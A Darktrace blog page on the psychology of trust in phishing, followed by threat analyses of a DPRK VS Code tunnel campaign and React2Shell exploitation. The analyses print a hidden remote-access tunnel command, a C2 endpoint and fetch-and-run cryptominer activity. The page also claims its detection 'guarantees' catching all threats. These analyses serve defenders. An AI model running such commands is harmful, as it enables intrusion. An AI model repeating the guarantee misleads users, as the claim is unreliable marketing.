Blog
/
Email
/
July 18, 2023

Understanding Email Security & the Psychology of Trust

We explore how psychological research into the nature of trust relates to our relationship with technology - and what that means for AI solutions.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Hanah Darley
Director of Threat Research
Photo showing woman logging into her laptop with username and passwordDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
18
Jul 2023

When security teams discuss the possibility of phishing attacks targeting their organization, often the first reaction is to assume it is inevitable because of the users. Users are typically referenced in cyber security conversations as organizations’ greatest weaknesses, cited as the causes of many grave cyber-attacks because they click links, open attachments, or allow multi-factor authentication bypass without verifying the purpose.

While for many, the weakness of the user may feel like a fact rather than a theory, there is significant evidence to suggest that users are psychologically incapable of protecting themselves from exploitation by phishing attacks, with or without regular cyber awareness trainings. The psychology of trust and the nature of human reliance on technology make the preparation of users for the exploitation of that trust in technology very difficult – if not impossible.

This Darktrace long read will highlight principles of psychological and sociological research regarding the nature of trust, elements of the trust that relate to technology, and how the human brain is wired to rely on implicit trust. These principles all point to the outcome that humans cannot be relied upon to identify phishing. Email security driven by machine augmentation, such as AI anomaly detection, is the clearest solution to tackle that challenge.

What is the psychology of trust?

Psychological and sociological theories on trust largely centre around the importance of dependence and a two-party system: the trustor and the trustee. Most research has studied the impacts of trust decisions on interpersonal relationships, and the characteristics which make those relationships more or less likely to succeed. In behavioural terms, the elements most frequently referenced in trust decisions are emotional characteristics such as benevolence, integrity, competence, and predictability.1

Most of the behavioural evaluations of trust decisions survey why someone chooses to trust another person, how they made that decision, and how quickly they arrived at their choice. However, these micro-choices about trust require the context that trust is essential to human survival. Trust decisions are rooted in many of the same survival instincts which require the brain to categorize information and determine possible dangers. More broadly, successful trust relationships are essential in maintaining the fabric of human society, critical to every element of human life.

Trust can be compared to dark matter (Rotenberg, 2018), which is the extensive but often difficult to observe material that binds planets and earthly matter. In the same way, trust is an integral but often a silent component of human life, connecting people and enabling social functioning.2

Defining implicit and routine trust

As briefly mentioned earlier, dependence is an essential element of the trusting relationship. Being able to build a routine of trust, based on the maintenance rather than establishment of trust, becomes implicit within everyday life. For example, speaking to a friend about personal issues and life developments is often a subconscious reaction to the events occurring, rather than an explicit choice to trust said friend each time one has new experiences.

Active and passive levels of cognition are important to recognize in decision-making, such as trust choices. Decision-making is often an active cognitive process requiring a lot of resource from the brain. However, many decisions occur passively, especially if they are not new choices e.g. habits or routines. The brain’s focus turns to immediate tasks while relegating habitual choices to subconscious thought processes, passive cognition. Passive cognition leaves the brain open to impacts from inattentional blindness, wherein the individual may be abstractly aware of the choice but it is not the focus of their thought processes or actively acknowledged as a decision. These levels of cognition are mostly referenced as “attention” within the brain’s cognition and processing.3

This idea is essentially a concept of implicit trust, meaning trust which is occurring as background thought processes rather than active decision-making. This implicit trust extends to multiple areas of human life, including interpersonal relationships, but also habitual choice and lifestyle. When combined with the dependence on people and services, this implicit trust creates a haze of cognition where trust is implied and assumed, rather than actively chosen across a myriad of scenarios.

Trust and technology

As researchers at the University of Cambridge highlight in their research into trust and technology, ‘In a fundamental sense, all technology depends on trust.’  The same implicit trust systems which allow us to navigate social interactions by subconsciously choosing to trust, are also true of interactions with technology. The implied trust in technology and services is perhaps most easily explained by a metaphor.

Most people have a favourite brand of soda. People will routinely purchase that soda and drink it without testing it for chemicals or bacteria and without reading reviews to ensure the companies that produce it have not changed their quality standards. This is a helpful, representative example of routine trust, wherein the trust choice is implicit through habitual action and does not mean the person is actively thinking about the ramifications of continuing to use a product and trust it.

The principle of dependence is especially important in trust and technology discussions, because the modern human is entirely reliant on technology and so has no way to avoid trusting it.5   Specifically important in workplace scenarios, employees are given a mandatory set of technologies, from programs to devices and services, which they must interact with on a daily basis. Over time, the same implicit trust that would form between two people forms between the user and the technology. The key difference between interpersonal trust and technological trust is that deception is often much more difficult to identify.

The implicit trust in workplace technology

To provide a bit of workplace-specific context, organizations rely on technology providers for the operation (and often the security) of their devices. The organizations also rely on the employees (users) to use those technologies within the accepted policies and operational guidelines. The employees rely on the organization to determine which products and services are safe or unsafe.

Within this context, implicit trust is occurring at every layer of the organization and its technological holdings, but often the trust choice is only made annually by a small security team rather than continually evaluated. Systems and programs remain in place for years and are used because “that’s the way it’s always been done. Within that context, the exploitation of that trust by threat actors impersonating or compromising those technologies or services is extremely difficult to identify as a human.

For example, many organizations utilize email communications to promote software updates for employees. Typically, it would consist of email prompting employees to update versions from the vendors directly or from public marketplaces, such as App Store on Mac or Microsoft Store for Windows. If that kind of email were to be impersonated, spoofing an update and including a malicious link or attachment, there would be no reason for the employee to question that email, given the explicit trust enforced through habitual use of that service and program.

Inattentional blindness: How the brain ignores change

Users are psychologically predisposed to trust routinely used technologies and services, with most of those trust choices continuing subconsciously. Changes to these technologies would often be subject to inattentional blindness, a psychological phenomenon wherein the brain either overwrites sensory information with what the brain expects to see rather than what is actually perceived.

A great example of inattentional blindness6 is the following experiment, which asks individuals to count the number of times a ball is passed between multiple people. While that is occurring, something else is going on in the background, which, statistically, those tested will not see. The shocking part of this experiment comes after, when the researcher reveals that the event occurring in the background not seen by participants was a person in a gorilla suit moving back and forth between the group. This highlights how significant details can be overlooked by the brain and “overwritten” with other sensory information. When applied to technology, inattentional blindness and implicit trust makes spotting changes in behaviour, or indicators that a trusted technology or service has been compromised, nearly impossible for most humans to detect.

With all this in mind, how can you prepare users to correctly anticipate or identify a violation of that trust when their brains subconsciously make trust decisions and unintentionally ignore cues to suggest a change in behaviour? The short answer is, it’s difficult, if not impossible.

How threats exploit our implicit trust in technology

Most cyber threats are built around the idea of exploiting the implicit trust humans place in technology. Whether it’s techniques like “living off the land”, wherein programs normally associated with expected activities are leveraged to execute an attack, or through more overt psychological manipulation like phishing campaigns or scams, many cyber threats are predicated on the exploitation of human trust, rather than simply avoiding technological safeguards and building backdoors into programs.

In the case of phishing, it is easy to identify the attempts to leverage the trust of users in technology and services. The most common example of this would be spoofing, which is one of the most common tactics observed by Darktrace/Email. Spoofing is mimicking a trusted user or service, and can be accomplished through a variety of mechanisms, be it the creation of a fake domain meant to mirror a trusted link type, or the creation of an email account which appears to be a Human Resources, Internal Technology or Security service.

In the case of a falsified internal service, often dubbed a “Fake Support Spoof”, the user is exploited by following instructions from an accepted organizational authority figure and service provider, whose actions should normally be adhered to. These cases are often difficult to spot when studying the sender’s address or text of the email alone, but are made even more difficult to detect if an account from one of those services is compromised and the sender’s address is legitimate and expected for correspondence. Especially given the context of implicit trust, detecting deception in these cases would be extremely difficult.

How email security solutions can solve the problem of implicit trust

How can an organization prepare for this exploitation? How can it mitigate threats which are designed to exploit implicit trust? The answer is by using email security solutions that leverage behavioural analysis via anomaly detection, rather than traditional email gateways.

Expecting humans to identify the exploitation of their own trust is a high-risk low-reward endeavour, especially when it takes different forms, affects different users or portions of the organization differently, and doesn’t always have obvious red flags to identify it as suspicious. Cue email security using anomaly detection as the key answer to this evolving problem.

Anomaly detection enabled by machine learning and artificial intelligence (AI) removes the inattentional blindness that plagues human users and security teams and enables the identification of departures from the norm, even those designed to mimic expected activity. Using anomaly detection mitigates multiple human cognitive biases which might prevent teams from identifying evolving threats, and also guarantees that all malicious behaviour will be detected. Of course, anomaly detection means that security teams may be alerted to benign anomalous activity, but still guarantees that no threat, no matter how novel or cleverly packaged, won’t be identified and raised to the human security team.

Utilizing machine learning, especially unsupervised machine learning, mimics the benefits of human decision making and enables the identification of patterns and categorization of information without the framing and biases which allow trust to be leveraged and exploited.

For example, say a cleverly written email is sent from an address which appears to be a Microsoft affiliate, suggesting to the user that they need to patch their software due to the discovery of a new vulnerability. The sender’s address appears legitimate and there are news stories circulating on major media providers that a new Microsoft vulnerability is causing organizations a lot of problems. The link, if clicked, forwards the user to a login page to verify their Microsoft credentials before downloading the new version of the software. After logging in, the program is available for download, and only requires a few minutes to install. Whether this email was created by a service like ChatGPT (generative AI) or written by a person, if acted upon it would give the threat actor(s) access to the user’s credential and password as well as activate malware on the device and possibly broader network if the software is downloaded.

If we are relying on users to identify this as unusual, there are a lot of evidence points that enforce their implicit trust in Microsoft services that make them want to comply with the email rather than question it. Comparatively, anomaly detection-driven email security would flag the unusualness of the source, as it would likely not be coming from a Microsoft-owned IP address and the sender would be unusual for the organization, which does not normally receive mail from the sender. The language might indicate solicitation, an attempt to entice the user to act, and the link could be flagged as it contains a hidden redirect or tailored information which the user cannot see, whether it is hidden beneath text like “Click Here” or due to link shortening. All of this information is present and discoverable in the phishing email, but often invisible to human users due to the trust decisions made months or even years ago for known products and services.

AI-driven Email Security: The Way Forward

Email security solutions employing anomaly detection are critical weapons for security teams in the fight to stay ahead of evolving threats and varied kill chains, which are growing more complex year on year. The intertwining nature of technology, coupled with massive social reliance on technology, guarantees that implicit trust will be exploited more and more, giving threat actors a variety of avenues to penetrate an organization. The changing nature of phishing and social engineering made possible by generative AI is just a drop in the ocean of the possible threats organizations face, and most will involve a trusted product or service being leveraged as an access point or attack vector. Anomaly detection and AI-driven email security are the most practical solution for security teams aiming to prevent, detect, and mitigate user and technology targeting using the exploitation of trust.

References

1https://www.kellogg.northwestern.edu/trust-project/videos/waytz-ep-1.aspx

2Rotenberg, K.J. (2018). The Psychology of Trust. Routledge.

3https://www.cognifit.com/gb/attention

4https://www.trusttech.cam.ac.uk/perspectives/technology-humanity-society-democracy/what-trust-technology-conceptual-bases-common

5Tyler, T.R. and Kramer, R.M. (2001). Trust in organizations : frontiers of theory and research. Thousand Oaks U.A.: Sage Publ, pp.39–49.

6https://link.springer.com/article/10.1007/s00426-006-0072-4

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Hanah Darley
Director of Threat Research

More in this series

No items found.

Blog

/

Network

/

January 22, 2026

Darktrace Identifies Campaign Targeting South Korea Leveraging VS Code for Remote Access

campaign targeting south orea leveraging vs code for remote accessDefault blog imageDefault blog image

Introduction

Darktrace analysts recently identified a campaign aligned with Democratic People’s Republic of Korea (DPRK) activity that targets users in South Korea, leveraging Javascript Encoded (JSE) scripts and government-themed decoy documents to deploy a Visual Studio Code (VS Code) tunnel to establish remote access.

Technical analysis

Decoy document with title “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026”.
Figure 1: Decoy document with title “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026”.

The sample observed in this campaign is a JSE file disguised as a Hangul Word Processor (HWPX) document, likely sent to targets via a spear-phishing email. The JSE file contains multiple Base64-encoded blobs and is executed by Windows Script Host. The HWPX file is titled “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026 (1)” in C:\ProgramData and is opened as a decoy. The Hangul documents impersonate the Ministry of Personnel Management, a South Korean government agency responsible for managing the civil service. Based on the metadata within the documents, the threat actors appear to have taken the documents from the government’s website and edited them to appear legitimate.

Base64 encoded blob.
Figure 2: Base64 encoded blob.

The script then downloads the VSCode CLI ZIP archives from Microsoft into C:\ProgramData, along with code.exe (the legitimate VS Code executable) and a file named out.txt.

In a hidden window, the command cmd.exe /c echo | "C:\ProgramData\code.exe" tunnel --name bizeugene > "C:\ProgramData\out.txt" 2>&1 is run, establishinga VS Code tunnel named “bizeugene”.

VSCode Tunnel setup.
Figure 3: VSCode Tunnel setup.

VS Code tunnels allows users connect to a remote computer and use Visual Studio Code. The remote computer runs a VS Code server that creates an encrypted connection to Microsoft’s tunnel service. A user can then connect to that machine from another device using the VS Code application or a web browser after signing in with GitHub or Microsoft. Abuse of VS Code tunnels was first identified in 2023 and has since been used by Chinese Advance Persistent Threat (APT) groups targeting digital infrastructure and government entities in Southeast Asia [1].

 Contents of out.txt.
Figure 4: Contents of out.txt.

The file “out.txt” contains VS Code Server logs along with a generated GitHub device code. Once the threat actor authorizes the tunnel from their GitHub account, the compromised system is connected via VS Code. This allows the threat actor to have interactive access over the system, with access to the VS Code’s terminal and file browser, enabling them to retrieve payloads and exfiltrate data.

GitHub screenshot after connection is authorized.
Figure 5: GitHub screenshot after connection is authorized.

This code, along with the tunnel token “bizeugene”, is sent in a POST request to https://www.yespp.co.kr/common/include/code/out.php, a legitimate South Korean site that has been compromised is now used as a command-and-control (C2) server.

Conclusion

The use of Hancom document formats, DPRK government impersonation, prolonged remote access, and the victim targeting observed in this campaign are consistent with operational patterns previously attributed to DPRK-aligned threat actors. While definitive attribution cannot be made based on this sample alone, the alignment with established DPRK tactics, techniques, and procedures (TTPs) increases confidence that this activity originates from a DPRK state-aligned threat actor.

This activity shows how threat actors can use legitimate software rather than custom malware to maintain access to compromised systems. By using VS Code tunnels, attackers are able to communicate through trusted Microsoft infrastructure instead of dedicated C2 servers. The use of widely trusted applications makes detection more difficult, particularly in environments where developer tools are commonly installed. Traditional security controls that focus on blocking known malware may not identify this type of activity, as the tools themselves are not inherently malicious and are often signed by legitimate vendors.

Credit to Tara Gould (Malware Research Lead)
Edited by Ryan Traill (Analyst Content Lead)

Appendix

Indicators of Compromise (IoCs)

115.68.110.73 - compromised site IP

9fe43e08c8f446554340f972dac8a68c - 2026년 상반기 국내대학원 석사야간과정 위탁교육생 선발관련 서류 (1).hwpx.jse

MITRE ATTACK

T1566.001 - Phishing: Attachment

T1059 - Command and Scripting Interpreter

T1204.002 - User Execution

T1027 - Obfuscated Files and Information

T1218 - Signed Binary Proxy Execution

T1105 - Ingress Tool Transfer

T1090 - Proxy

T1041 - Exfiltration Over C2 Channel

References

[1]  https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/

Continue reading
About the author

Blog

/

/

January 19, 2026

React2Shell Reflections: Cloud Insights, Finance Sector Impacts, and How Threat Actors Moved So Quickly

React2Shell Default blog imageDefault blog image

Introduction

Last month’s disclosure of CVE 2025-55812, known as React2Shell, provided a reminder of how quickly modern threat actors can operationalize newly disclosed vulnerabilities, particularly in cloud-hosted environments.

The vulnerability was discovered on December 3, 2025, with a patch made available on the same day. Within 30 hours of the patch, a publicly available proof-of-concept emerged that could be used to exploit any vulnerable server. This short timeline meant many systems remained unpatched when attackers began actively exploiting the vulnerability.  

Darktrace researchers rapidly deployed a new honeypot to monitor exploitation of CVE 2025-55812 in the wild.

Within two minutes of deployment, Darktrace observed opportunistic attackers exploiting this unauthenticated remote code execution flaw in React Server Components, leveraging a single crafted request to gain control of exposed Next.js servers. Exploitation quickly progressed from reconnaissance to scripted payload delivery, HTTP beaconing, and cryptomining, underscoring how automation and pre‑positioned infrastructure by threat actors now compress the window between disclosure and active exploitation to mere hours.

For cloud‑native organizations, particularly those in the financial sector, where Darktrace observed the greatest impact, React2Shell highlights the growing disconnect between patch availability and attacker timelines, increasing the likelihood that even short delays in remediation can result in real‑world compromise.

Cloud insights

In contrast to traditional enterprise networks built around layered controls, cloud architectures are often intentionally internet-accessible by default. When vulnerabilities emerge in common application frameworks such as React and Next.js, attackers face minimal friction.  No phishing campaign, no credential theft, and no lateral movement are required; only an exposed service and exploitable condition.

The activity Darktrace observed during the React2shell intrusions reflects techniques that are familiar yet highly effective in cloud-based attacks. Attackers quickly pivot from an exposed internet-facing application to abusing the underlying cloud infrastructure, using automated exploitation to deploy secondary payloads at scale and ultimately act on their objectives, whether monetizing access through cryptomining or to burying themselves deeper in the environment for sustained persistence.

Cloud Case Study

In one incident, opportunistic attackers rapidly exploited an internet-facing Azure virtual machine (VM) running a Next.js application, abusing the React/next.js vulnerability to gain remote command execution within hours of the service becoming exposed. The compromise resulted in the staged deployment of a Go-based remote access trojan (RAT), followed by a series of cryptomining payloads such as XMrig.

Initial Access

Initial access appears to have originated from abused virtual private network (VPN) infrastructure, with the source IP (146.70.192[.]180) later identified as being associated with Surfshark

The IP address above is associated with VPN abuse leveraged for initial exploitation via Surfshark infrastructure.
Figure 1: The IP address above is associated with VPN abuse leveraged for initial exploitation via Surfshark infrastructure.

The use of commercial VPN exit nodes reflects a wider trend of opportunistic attackers leveraging low‑cost infrastructure to gain rapid, anonymous access.

Parent process telemetry later confirmed execution originated from the Next.js server, strongly indicating application-layer compromise rather than SSH brute force, misused credentials, or management-plane abuse.

Payload execution

Shortly after successful exploitation, Darktrace identified a suspicious file and subsequent execution. One of the first payloads retrieved was a binary masquerading as “vim”, a naming convention commonly used to evade casual inspection in Linux environments. This directly ties the payload execution to the compromised Next.js application process, reinforcing the hypothesis of exploit-driven access.

Command-and-Control (C2)

Network flow logs revealed outbound connections back to the same external IP involved in the inbound activity. From a defensive perspective, this pattern is significant as web servers typically receive inbound requests, and any persistent outbound callbacks — especially to the same IP — indicate likely post-exploitation control. In this case, a C2 detection model alert was raised approximately 90 minutes after the first indicators, reflecting the time required for sufficient behavioral evidence to confirm beaconing rather than benign application traffic.

Cryptominers deployment and re-exploitation

Following successful command execution within the compromised Next.js workload, the attackers rapidly transitioned to monetization by deploying cryptomining payloads. Microsoft Defender observed a shell command designed to fetch and execute a binary named “x” via either curl or wget, ensuring successful delivery regardless of which tooling was availability on the Azure VM.

The binary was written to /home/wasiluser/dashboard/x and subsequently executed, with open-source intelligence (OSINT) enrichment strongly suggesting it was a cryptominer consistent with XMRig‑style tooling. Later the same day, additional activity revealed the host downloading a static XMRig binary directly from GitHub and placing it in a hidden cache directory (/home/wasiluser/.cache/.sys/).

The use of trusted infrastructure and legitimate open‑source tooling indicates an opportunistic approach focused on reliability and speed. The repeated deployment of cryptominers strongly suggests re‑exploitation of the same vulnerable web application rather than reliance on traditional persistence mechanisms. This behavior is characteristic of cloud‑focused attacks, where publicly exposed workloads can be repeatedly compromised at scale more easily.

Financial sector spotlight

During the mass exploitation of React2Shell, Darktrace observed targeting by likely North Korean affiliated actors focused on financial organizations in the United Kingdom, Sweden, Spain, Portugal, Nigeria, Kenya, Qatar, and Chile.

The targeting of the financial sector is not unexpected, but the emergence of new Democratic People’s Republic of Korea (DPRK) tooling, including a Beavertail variant and EtherRat, a previously undocumented Linux implant, highlights the need for updated rules and signatures for organizations that rely on them.

EtherRAT uses Ethereum smart contracts for C2 resolution, polling every 500 milliseconds and employing five persistence mechanisms. It downloads its own Node.js runtime from nodejs[.]org and queries nine Ethereum RPC endpoints in parallel, selecting the majority response to determine its C2 URL. EtherRAT also overlaps with the Contagious Interview campaign, which has targeted blockchain developers since early 2025.

Read more finance‑sector insights in Darktrace’s white paper, The State of Cyber Security in the Finance Sector.

Threat actor behavior and speed

Darktrace’s honeypot was exploited just two minutes after coming online, demonstrating how automated scanning, pre-positioned infrastructure and staging, and C2 infrastructure traced back to “bulletproof” hosting reflects a mature, well‑resourced operational chain.

For financial organizations, particularly those operating cloud‑native platforms, digital asset services, or internet‑facing APIs, this activity demonstrates how rapidly geopolitical threat actors can weaponize newly disclosed vulnerabilities, turning short patching delays into strategic opportunities for long‑term access and financial gain. This underscores the need for a behavioral-anomaly-led security posture.

Credit to Nathaniel Jones (VP, Security & AI Strategy, Field CISO) and Mark Turner (Specialist Security Researcher)

Edited by Ryan Traill (Analyst Content Lead)

Appendices

Indicators of Compromise (IoCs)

146.70.192[.]180 – IP Address – Endpoint Associated with Surfshark

References

https://www.darktrace.com/resources/the-state-of-cybersecurity-in-the-finance-sector

Continue reading
About the author
Nathaniel Jones
VP, Security & AI Strategy, Field CISO
Your data. Our AI.
Elevate your network security with Darktrace AI